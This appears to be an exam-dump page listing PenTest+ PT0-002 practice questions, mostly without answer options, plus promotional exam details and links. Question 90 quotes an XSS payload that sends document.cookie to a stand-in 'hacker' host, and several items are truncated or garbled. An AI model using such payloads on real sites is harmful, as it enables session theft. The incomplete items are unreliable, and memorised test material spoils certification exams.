4/5 - (1 vote)

Updated Free CompTIA PT0-002 Test Engine Questions with 310 Q&As

The Best CompTIA PenTest+ PT0-002 Professional Exam Questions

QUESTION 73
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






QUESTION 74
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

 
 
 
 

QUESTION 75
During the assessment of a client’s cloud and on-premises environments, a penetration tester was able to gain ownership of a storage object within the cloud environment using the….. premises credentials. Which of the following best describes why the tester was able to gain access?

 
 
 
 

QUESTION 76
Given the following output:
User-agent:*
Disallow: /author/
Disallow: /xmlrpc.php
Disallow: /wp-admin
Disallow: /page/
During which of the following activities was this output MOST likely obtained?

 
 
 
 

QUESTION 77
A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

 
 
 
 

QUESTION 78
Given the following code:

Which of the following data structures is systems?

 
 
 
 

QUESTION 79
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

 
 
 
 

QUESTION 80
During an assessment, a penetration tester was able to access the organization’s wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

 
 
 
 

QUESTION 81
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

 
 
 
 

QUESTION 82
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

QUESTION 83
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

QUESTION 84
A penetration tester was hired to perform a physical security assessment of an organization’s office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization’s building without raising too many alerts?

 
 
 
 

QUESTION 85
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

 
 
 
 

QUESTION 86
A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

 
 
 
 

QUESTION 87
ion tester is attempting to get more people from a target company to download and run an executable. Which of the following would be the.. :tive way for the tester to achieve this objective?

 
 
 
 

QUESTION 88
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?

 
 
 
 

QUESTION 89
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

 
 
 
 

QUESTION 90
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

 
 
 
 
 
 

QUESTION 91
A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

 
 
 
 

QUESTION 92
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

 
 
 
 

QUESTION 93
Which of the following factors would a penetration tester most likely consider when testing at a location?

 
 
 
 

QUESTION 94
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

 
 
 
 
 
 

QUESTION 95
A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client’s building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.)

 
 
 
 
 
 

QUESTION 96
A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

 
 
 
 

QUESTION 97
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


CompTIA PT0-002 exam contains a maximum of 85 questions, which are a combination of multiple-choice and performance-based questions. Candidates must score at least 750 out of 900 points to pass the exam. PT0-002 exam duration is 165 minutes, and registration fee is $359. PT0-002 exam can be taken at any Pearson VUE testing center worldwide, and it is available in English, Japanese, and Portuguese language.

CompTIA PT0-002 certification is ideal for individuals who want to enhance their skills and gain recognition in penetration testing. It is also beneficial for professionals who want to develop a career in cybersecurity, including certified ethical hackers, information security analysts, and security engineers. CompTIA PenTest+ Certification certification exam covers the latest industry practices and techniques, including cloud and mobile device penetration testing, data analysis, and network protection. Candidates who pass the exam demonstrate their proficiency in the domain of penetration testing, which is highly valued by employers and clients alike.

 

Try 100% Updated PT0-002 Exam Questions [2023]: https://www.actualcollection.com/PT0-002-exam-questions.html

Related Links: myportal.utt.edu.tt www.stes.tyc.edu.tw www.stes.tyc.edu.tw myportal.utt.edu.tt www.stes.tyc.edu.tw myportal.utt.edu.tt